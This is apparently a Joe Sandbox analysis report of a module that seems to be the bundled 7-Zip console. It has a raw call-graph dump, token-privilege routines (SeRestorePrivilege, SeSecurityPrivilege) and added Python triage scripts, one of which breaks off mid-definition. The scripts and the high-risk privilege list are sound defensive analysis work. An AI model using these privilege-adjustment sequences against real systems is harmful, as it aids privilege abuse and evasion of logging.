_CxxThrowException 75686->75688 75689 5a4ffe 75686->75689 75687->75690 75757 5a1524 malloc _CxxThrowException __EH_prolog ctype 75687->75757 75688->75689 75756 5e0551 malloc _CxxThrowException free memcpy ctype 75689->75756 75693 5b384c 75690->75693 75696 5b3856 __EH_prolog 75693->75696 75694 5a2e04 malloc _CxxThrowException 75694->75696 75695 5a2fec 3 API calls 75695->75696 75696->75694 75696->75695 75697 5a2f88 3 API calls 75696->75697 75698 5e04d2 5 API calls 75696->75698 75700 5a1e40 free ctype 75696->75700 75701 5b3917 75696->75701 75758 5b3b76 malloc _CxxThrowException __EH_prolog ctype 75696->75758 75697->75696 75698->75696 75700->75696 75701->75517 75702->75474 75703->75479 75704->75487 75705->75489 75706->75491 75707->75493 75708->75501 75709->75498 75710->75507 75711->75514 75712->75550 75713->75550 75714->75559 75715->75547 75716->75557 75717->75558 75718->75564 75719->75573 75720->75578 75721->75580 75722->75587 75723->75581 75724->75526 75725->75528 75727 5b3a3b 75726->75727 75728 5b2722 75726->75728 75759 5b3bd9 free ctype 75727->75759 75728->75548 75728->75552 75730 5b3a42 75731 5b3a6f 75730->75731 75732 5b3a52 _CxxThrowException 75730->75732 75733 5b3a67 75730->75733 75731->75728 75761 5b3b76 malloc _CxxThrowException __EH_prolog ctype 75731->75761 75732->75733 75760 5e0551 malloc _CxxThrowException free memcpy ctype 75733->75760 75736->75548 75737->75565 75738->75575 75739->75576 75740->75574 75741->75542 75742->75533 75743->75540 75744->75663 75746 5a2ea0 75745->75746 75746->75746 75747 5a2ba6 2 API calls 75746->75747 75748 5a2eaf 75747->75748 75749 5b2a61 malloc _CxxThrowException free _CxxThrowException memcpy 75748->75749 75749->75672 75750->75677 75751->75677 75752->75677 75753->75677 75754->75682 75755->75675 75756->75687 75757->75687 75758->75696 75759->75730 75760->75731 75761->75731 75763 5c7f14 75762->75763 75765 5c7ef7 75762->75765 75763->75597 75764 5c7193 free 75764->75765 75765->75763 75765->75764 75790 5a1e40 free 75765->75790 75768 
5a2e04 2 API calls 75767->75768 75769 5c7103 75768->75769 75769->75597 75771 5c7a4a __EH_prolog 75770->75771 75791 5a361b 6 API calls 2 library calls 75771->75791 75773 5c7a78 75792 5a361b 6 API calls 2 library calls 75773->75792 75775 5c7a83 75776 5c7b20 75775->75776 75781 5a2e04 malloc _CxxThrowException 75775->75781 75782 5a2fec 3 API calls 75775->75782 75783 5a2fec 3 API calls 75775->75783 75784 5e04d2 5 API calls 75775->75784 75787 5a1e40 free ctype 75775->75787 75793 5c7955 malloc _CxxThrowException __EH_prolog ctype 75775->75793 75794 5d2db9 free ctype 75776->75794 75778 5c7b2b 75795 5d2db9 free ctype 75778->75795 75780 5c7b37 75780->75597 75781->75775 75782->75775 75785 5c7aca wcscmp 75783->75785 75784->75775 75785->75775 75787->75775 75788->75597 75789->75597 75790->75765 75791->75773 75792->75775 75793->75775 75794->75778 75795->75780 75797 5a1e0c ctype 2 API calls 75796->75797 75798 5a1fcb 75797->75798 75798->75611 75804 5a2033 75799->75804 75802->75616 75803->75618 75805 5a203b 75804->75805 75806 5a2054 75805->75806 75807 5a2045 75805->75807 75812 5a37ff 9 API calls 75806->75812 75811 5a421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 75807->75811 75810 5a2022 fputs 75810->75614 75811->75810 75812->75810 75815 626bc6 75816 626bcd 75815->75816 75818 626bca 75815->75818 75817 626bd1 malloc 75816->75817 75816->75818 75817->75818 75819 5ccefb 75820 5ccf03 75819->75820 75850 5cd0cc 75819->75850 75820->75850 75866 5ccae9 VariantClear 75820->75866 75822 5ccf59 75822->75850 75867 5ccae9 VariantClear 75822->75867 75824 5ccf71 75824->75850 75868 5ccae9 VariantClear 75824->75868 75826 5ccf87 75826->75850 75869 5ccae9 VariantClear 75826->75869 75828 5ccf9d 75828->75850 75870 5ccae9 VariantClear 75828->75870 75830 5ccfb3 75830->75850 75871 5ccae9 VariantClear 75830->75871 75832 5ccfc9 75832->75850 75872 5a4504 malloc _CxxThrowException 75832->75872 75834 5ccfdc 75835 5a2e04 2 API calls 75834->75835 75836 5ccfe7 75835->75836 75837 5cd009 
75836->75837 75838 5a2f88 3 API calls 75836->75838 75839 5cd07b 75837->75839 75840 5cd080 75837->75840 75841 5cd030 75837->75841 75838->75837 75880 5a1e40 free 75839->75880 75877 5c7a0c CharUpperW 75840->75877 75844 5a2e04 2 API calls 75841->75844 75847 5cd038 75844->75847 75845 5cd0c4 75881 5a1e40 free 75845->75881 75846 5cd08b 75878 5bfdbc 4 API calls 2 library calls 75846->75878 75849 5a2e04 2 API calls 75847->75849 75852 5cd046 75849->75852 75873 5bfdbc 4 API calls 2 library calls 75852->75873 75853 5cd0a7 75855 5a2fec 3 API calls 75853->75855 75857 5cd0b3 75855->75857 75856 5cd057 75858 5a2fec 3 API calls 75856->75858 75879 5a1e40 free 75857->75879 75860 5cd063 75858->75860 75874 5a1e40 free 75860->75874 75862 5cd06b 75875 5a1e40 free 75862->75875 75864 5cd073 75876 5a1e40 free 75864->75876 75866->75822 75867->75824 75868->75826 75869->75828 75870->75830 75871->75832 75872->75834 75873->75856 75874->75862 75875->75864 75876->75839 75877->75846 75878->75853 75879->75839 75880->75845 75881->75850 75882 5ac3bd 75883 5ac3db 75882->75883 75884 5ac3ca 75882->75884 75884->75883 75886 5a1e40 free 75884->75886 75886->75883 75887 5d5475 75888 5a2fec 3 API calls 75887->75888 75889 5d54b4 75888->75889 75892 5dc911 75889->75892 75891 5d54bb 75893 5dc92f 75892->75893 75894 5dc926 GetTickCount 75892->75894 75895 5dc96d 75893->75895 75898 5dcb64 75893->75898 75956 5a2ab1 strcmp 75893->75956 75894->75893 75895->75898 75937 5dc86a 75895->75937 75898->75891 75900 5dc9ce 75900->75898 75903 5a27bb 3 API calls 75900->75903 75901 5dc95b 75901->75895 75957 5a3542 wcscmp 75901->75957 75907 5dc9e2 75903->75907 75905 5dca0a 75906 5dca21 75905->75906 75908 5a286d 5 API calls 75905->75908 75909 5dcb10 75906->75909 75916 5a286d 5 API calls 75906->75916 75907->75905 75959 5a286d 75907->75959 75911 5dca16 75908->75911 75945 5dcb74 75909->75945 75966 5a28fa malloc _CxxThrowException free memcpy _CxxThrowException 75911->75966 75919 5dca40 75916->75919 75918 5dcb59 75971 5dcb92 malloc 
_CxxThrowException free 75918->75971 75922 5a2fec 3 API calls 75919->75922 75923 5dca4e 75922->75923 75929 5a2033 10 API calls 75923->75929 75925 5dcb49 75970 5a1f91 fflush 75925->75970 75926 5dcb50 75928 5a27bb 3 API calls 75926->75928 75928->75918 75936 5dca6a 75929->75936 75930 5dcaf5 75969 5a28fa malloc _CxxThrowException free memcpy _CxxThrowException 75930->75969 75932 5a2fec 3 API calls 75932->75936 75935 5a2033 10 API calls 75935->75936 75936->75930 75936->75932 75936->75935 75967 5a3599 memmove 75936->75967 75968 5a3402 malloc _CxxThrowException free memmove _CxxThrowException 75936->75968 75939 5dc88c __aulldiv 75937->75939 75938 5dc8d3 strlen 75940 5dc8f1 75938->75940 75941 5dc900 75938->75941 75939->75938 75940->75941 75943 5a286d 5 API calls 75940->75943 75942 5a28a1 5 API calls 75941->75942 75944 5dc90c 75942->75944 75943->75940 75944->75900 75958 5a2ab1 strcmp 75944->75958 75946 5dcb7c strcmp 75945->75946 75947 5dcb1c 75945->75947 75946->75947 75947->75918 75948 5dc7d7 75947->75948 75949 5dc849 75948->75949 75950 5dc7ea 75948->75950 75951 5dc85a fputs 75949->75951 75973 5a1f91 fflush 75949->75973 75952 5dc7fe fputs 75950->75952 75972 5a25cb malloc _CxxThrowException free _CxxThrowException ctype 75950->75972 75951->75925 75951->75926 75952->75949 75956->75901 75957->75895 75958->75900 75974 5a1e9d 75959->75974 75962 5a28a1 75963 5a28b0 75962->75963 75963->75963 75979 5a267f 75963->75979 75965 5a28bf 75965->75905 75966->75906 75967->75936 75968->75936 75969->75909 75970->75926 75971->75898 75972->75952 75973->75951 75975 5a1ea8 75974->75975 75976 5a1ead 75974->75976 75978 5a263c malloc _CxxThrowException free memcpy _CxxThrowException 75975->75978 75976->75962 75978->75976 75980 5a26c2 75979->75980 75982 5a2693 75979->75982 75980->75965 75981 5a26c8 _CxxThrowException 75983 5a26dd 75981->75983 75982->75981 75984 5a26bc 75982->75984 75985 5a1e0c ctype 2 API calls 75983->75985 75988 5a2595 malloc _CxxThrowException free memcpy ctype 75984->75988 75987 
                                        Execution graph (Joe Sandbox IDA plugin call-graph dump for the module at 005A0000 in process 10, snapshot hcaresult_10_2_5a0000_7zr.jbxd; the node/edge listing is omitted here). Routines recoverable from the dump: the token-privilege routine at 005B3D66 (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, and CloseHandle through the helper at 005B3E04); the file-attribute routines at 005A7919 and 005A7AB2 (four DeviceIoControl calls, SetFileTime, and GetDiskFreeSpaceW resolved through GetModuleHandleW/GetProcAddress at 005A9252); a VirtualAlloc call at 00626B23; a WaitForSingleObject/SetEvent pair at 00637D80 and 00637EA0; SetConsoleCtrlHandler at 005D544F; and the console-output paths (fputs/fputc) reached from 005DA42C. The remaining nodes are CRT and string helpers (malloc, free, memcpy, memmove, memset, _CxxThrowException, CharUpperW, VariantClear). The snapshot name and the 7zCon.sfx / "Scanning the drive for archives:" strings in the listings that follow are consistent with this module being the 7-Zip console (7zr) code bundled with the sample; when triaging the "Enables security privileges" signature, confirm which process and module it resolves to before attributing the privilege adjustments to the payload itself.

                                        Control-flow graph of the routine at 005A9313 (blocks 005A9313-005A9398; edge listing omitted): GetCurrentProcess and OpenProcessToken, then LookupPrivilegeValueW and AdjustTokenPrivileges, with GetLastError on the failure edge and CloseHandle on the paths where a token handle was obtained; if OpenProcessToken fails the routine returns without the CloseHandle block.
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000020,005B1EC5,?,7597AB50,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9329
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9330
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 005A9342
                                        • AdjustTokenPrivileges.KERNELBASE(005B1EC5,00000000,?,00000000,00000000,00000000), ref: 005A9368
                                        • GetLastError.KERNEL32 ref: 005A9372
                                        • CloseHandle.KERNELBASE(005B1EC5,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9388
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeRestorePrivilege
                                        • API String ID: 3398352648-1684392131
                                        • Opcode ID: 93fab6978dd92a2f6d259e92150f33395353d616a8c74d9709c4f3e5deebc6e9
                                        • Instruction ID: 0e65a29ba84a04adc6e71b163a93e5751269f5fd8478b095bc58e47f3b5251b3
                                        • Opcode Fuzzy Hash: 93fab6978dd92a2f6d259e92150f33395353d616a8c74d9709c4f3e5deebc6e9
                                        • Instruction Fuzzy Hash: E801C07A946228ABCB605FF59C49BDE7F7CAF03754F045565E441E2280D6728608C7A0

                                        Control-flow graph of the routine at 005B3D66 (blocks 005B3D66-005B3DFE; edge listing omitted): GetCurrentProcess, OpenProcessToken with desired access 00000028 (TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES), LookupPrivilegeValueW, AdjustTokenPrivileges with GetLastError on the failure edge, and a call to the CloseHandle helper at 005B3E04 on the common exit block at 005B3DE3.
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B3D6B
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D7D
                                        • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D94
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005B3DB6
                                        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DCB
                                        • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 3475889169-2333288578
                                        • Opcode ID: df5b664a5bf0a59c476ab3f0343ef71543160b1a893792588bfbbd78320b8d17
                                        • Instruction ID: 749513328590fcecf552839362cf8d5b2dccbb6ae467c18378458f6410fd4c6f
                                        • Opcode Fuzzy Hash: df5b664a5bf0a59c476ab3f0343ef71543160b1a893792588bfbbd78320b8d17
                                        • Instruction Fuzzy Hash: DC1152B59411199FDB10EFA5DC89AFEFB7DFB05754F000529E412F2290DB319A08CA60
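The two API listings above (routines 005A9313 and 005B3D66) show the standard Windows privilege-enable sequence: open the process token, look up the LUID of a named privilege, call AdjustTokenPrivileges, then read GetLastError. That last call matters because AdjustTokenPrivileges reports success even when the privilege was not granted, signalling ERROR_NOT_ALL_ASSIGNED only through GetLastError. The script below is an added example for this report, not Joe Sandbox code and not code from the analysed sample: it parses API lines in the report's own "Api.MODULE(args), ref: address" format, decodes the OpenProcessToken access mask, pairs each LookupPrivilegeValueW with the AdjustTokenPrivileges that follows it, and flags privileges on a triage list. The parser, the dataclass names, and the HIGH_RISK_PRIVILEGES set are the author's assumptions; the two sample listings are copied from the listings on this page.

```python
# Added example: turn Joe Sandbox "APIs" listings into token-privilege findings.
import re
from dataclasses import dataclass
from typing import List

# OpenProcessToken desired-access bits (TOKEN_* constants from winnt.h).
TOKEN_ACCESS = {
    0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE",
    0x0004: "TOKEN_IMPERSONATE",    0x0008: "TOKEN_QUERY",
    0x0010: "TOKEN_QUERY_SOURCE",   0x0020: "TOKEN_ADJUST_PRIVILEGES",
    0x0040: "TOKEN_ADJUST_GROUPS",  0x0080: "TOKEN_ADJUST_DEFAULT",
    0x0100: "TOKEN_ADJUST_SESSIONID",
}

# Triage list chosen for this example (an assumption, not a Windows or Joe Sandbox list).
HIGH_RISK_PRIVILEGES = {
    "SeDebugPrivilege", "SeLoadDriverPrivilege", "SeTcbPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeSecurityPrivilege",  # required to clear the Security event log
}

# One report line: "• Api.MODULE(arg,arg,...), ref: 005A9329"; the argument list
# is absent for zero-argument calls such as "GetLastError.KERNEL32 ref: 005A9372".
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int


@dataclass
class PrivilegeFinding:
    privilege: str
    token_access: List[str]   # decoded OpenProcessToken access, or ["?"] if unrecovered
    adjusted: bool            # AdjustTokenPrivileges follows the lookup
    checked_last_error: bool  # GetLastError follows the adjust call
    high_risk: bool


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the bullet lines of one 'APIs' listing; lines in another format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def decode_token_access(mask: int) -> List[str]:
    """Expand an access mask into TOKEN_* names; bits outside the table stay as hex."""
    names = [name for bit, name in sorted(TOKEN_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(TOKEN_ACCESS)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def find_privilege_adjustments(calls: List[ApiCall]) -> List[PrivilegeFinding]:
    """Pair each LookupPrivilegeValueW with the AdjustTokenPrivileges that follows it.

    AdjustTokenPrivileges succeeds even when the privilege was not granted
    (GetLastError then yields ERROR_NOT_ALL_ASSIGNED), so a GetLastError after
    the adjust call is recorded as evidence that the caller checks the outcome.
    """
    findings, access = [], ["?"]
    for i, call in enumerate(calls):
        if call.api == "OpenProcessToken" and len(call.args) >= 2:
            try:
                access = decode_token_access(int(call.args[1], 16))
            except ValueError:  # Joe Sandbox prints '?' for arguments it could not recover
                access = ["?"]
        if call.api == "LookupPrivilegeValueW" and len(call.args) >= 2:
            privilege, adjusted, checked = call.args[1], False, False
            for later in calls[i + 1:]:
                if later.api == "LookupPrivilegeValueW":
                    break
                if later.api == "AdjustTokenPrivileges":
                    adjusted = True
                elif later.api == "GetLastError" and adjusted:
                    checked = True
            findings.append(PrivilegeFinding(privilege, access, adjusted, checked,
                                             privilege in HIGH_RISK_PRIVILEGES))
    return findings


def summarize(listing: str) -> List[PrivilegeFinding]:
    return find_privilege_adjustments(parse_api_lines(listing))


# API listings copied from the two routines on this page.
REPORT_APIS_5A9313 = """
• GetCurrentProcess.KERNEL32(00000020,005B1EC5,?,7597AB50,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9329
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9330
• LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 005A9342
• AdjustTokenPrivileges.KERNELBASE(005B1EC5,00000000,?,00000000,00000000,00000000), ref: 005A9368
• GetLastError.KERNEL32 ref: 005A9372
• CloseHandle.KERNELBASE(005B1EC5,?,?,?,?,005B1EC5,005B1CEF), ref: 005A9388
"""
REPORT_APIS_5B3D66 = """
• __EH_prolog.LIBCMT ref: 005B3D6B
• GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D7D
• OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3D94
• LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 005B3DB6
• AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DCB
• GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 005B3DD5
"""

if __name__ == "__main__":
    for name, listing in (("005A9313", REPORT_APIS_5A9313), ("005B3D66", REPORT_APIS_5B3D66)):
        print(name, summarize(listing))
```

Running it on the two listings yields one finding each: SeRestorePrivilege from 005A9313 (token access unrecovered, shown as "?") and SeSecurityPrivilege from 005B3D66 (token opened with TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES); both adjust the privilege and then check GetLastError. Paste any other "APIs" listing from a Joe Sandbox report into the same function to triage it the same way.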
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005E81F1
                                          • Part of subcall function 005EF749: _CxxThrowException.MSVCRT(?,00654A58), ref: 005EF792
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionH_prologThrow
                                        • String ID:
                                        • API String ID: 461045715-3916222277
                                        • Opcode ID: c62de758f435c1793a6c261160cd9cd80bdff9c0490b58f73eaba97951711286
                                        • Instruction ID: 672cec5cc745d6755609fb1f93e8f3cc34f4b3080cd0d839c23e6f4a8c224789
                                        • Opcode Fuzzy Hash: c62de758f435c1793a6c261160cd9cd80bdff9c0490b58f73eaba97951711286
                                        • Instruction Fuzzy Hash: 5B92A13090028ADFDF19DFA9C944BBEBFB1BF45304F244499E889AB292CB719D45CB51
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A686D
                                          • Part of subcall function 005A6848: FindClose.KERNELBASE(00000000,?,005A6880), ref: 005A6853
                                        • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 005A68A5
                                        • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 005A68DE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Find$FileFirst$CloseH_prolog
                                        • String ID:
                                        • API String ID: 3371352514-0
                                        • Opcode ID: cc67faf20f2ea45e1d9eee027cb0b30ad5481aeaeb06ae30c3718de11279074b
                                        • Instruction ID: 72fa743a6e3a4941edddef59aaba93cff39a5fb9c2c2da5d0a4322f80d7167ef
                                        • Opcode Fuzzy Hash: cc67faf20f2ea45e1d9eee027cb0b30ad5481aeaeb06ae30c3718de11279074b
                                        • Instruction Fuzzy Hash: B111903150020A9BCB10EF64D8555FDBFB9FF52324F144629E9A157292DB358E85DB40

                                        Control-flow graph of the routine at 005DA013 (blocks 005DA013-005DACB5; edge listing omitted): a large console routine that builds the archive summary and prints it through fputs and the fputc wrapper at 005A1FA0, using the "Archives:", "Files:", "Folders:", "Size:", "Compressed:", "Open Errors:", "Archives with Errors:" and "Archives with Warnings:" strings listed under String ID below, with _CxxThrowException on the error exits.
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$ExceptionThrow
                                        • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&f$p&f$N
                                        • API String ID: 3665150552-1696439099
                                        • Opcode ID: c4aa830751c8d45632ab42405af528d6ca29ec1736608773db3fb0b9fb8490a4
                                        • Instruction ID: eb13a5aad3b65b8e43aaf3c7a36b68774344ce8ba1f31241281b8593be363d09
                                        • Opcode Fuzzy Hash: c4aa830751c8d45632ab42405af528d6ca29ec1736608773db3fb0b9fb8490a4
                                        • Instruction Fuzzy Hash: 03526A30904259DFDF26DBA8C899BDEBFB6BF85300F14419AE44967291DB706E84CF11

                                        Control-flow graph of the routine at 005DA42C (blocks 005DA42C-005DACB5; edge listing omitted): prints "Scanning the drive for archives:" with fputs, then shares the summary-printing tail of the routine at 005DA013 (the same fputs/fputc blocks from 005DA544 onward and the same _CxxThrowException error exits).
                                        APIs
                                        • fputs.MSVCRT(Scanning the drive for archives:), ref: 005DA43E
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputcfputs
                                        • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&f$p&f$!"$N
                                        • API String ID: 269475090-2754028480
                                        • Opcode ID: 26220e11c07190d60f4a15374158beaadace8e6e3031ed6bb8a11d35441988b9
                                        • Instruction ID: 144decfc9b0020281b8c30e0799d285b3421665ec17c5a0bb30e79706543e263
                                        • Opcode Fuzzy Hash: 26220e11c07190d60f4a15374158beaadace8e6e3031ed6bb8a11d35441988b9
                                        • Instruction Fuzzy Hash: EE226C30904259DFDF26EBA8C859BDEBFB6BF85300F14419BE44966291DB706E84CF11
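                                        The Memory Dump Source entries above name the .sdmp regions the disassembly was lifted from, and the "ref:" values in the APIs lists are virtual addresses inside those regions. The Python below is an added example, not part of the Joe Sandbox report and not code from the 7zr binary under analysis: it pulls the .sdmp names out of a pasted Memory Dump Source block, splits each name into fields, decodes the protection and type fields with the documented Windows PAGE_* and MEM_* constants, and reports which region a quoted address falls in. The field layout (process index, dump round, sequence number, base address, protection, flag, memory type, module index) is an assumption inferred from the five names on this page, where the protection field reads 0x02 for the PE header at 005A0000, 0x20 for the code at 005A1000 and 0x04 for the writable data at 00662000; because the name carries no size, a region is assumed to end where the next dump of the same module begins.

```python
"""Decode Joe Sandbox .sdmp names and place call-site addresses in a region.

Added example, not part of the Joe Sandbox report. The .sdmp field layout is an
assumption inferred from the five names on this page; the PAGE_* and MEM_*
values are the documented Windows constants from winnt.h.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Base protection values (low byte of the protection field; PAGE_GUARD and
# PAGE_NOCACHE are modifier bits above it and are masked off below).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.round.seq.base.protect.flag.type.module.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<round>[0-9A-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<flag>[0-9A-F]{8})\."
    r"(?P<type>[0-9A-F]{8})\.(?P<module>[0-9A-F]{8})\.sdmp"
)

# Constructed sample: the Memory Dump Source block of the first function above,
# pasted as it appears on the page (including the "Download File" link text).
SAMPLE_BLOCK = """
Memory Dump Source
• Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
• Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
• Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
"""


@dataclass(frozen=True)
class Dump:
    name: str
    proc: int
    base: int
    protect: int
    mem_type: int

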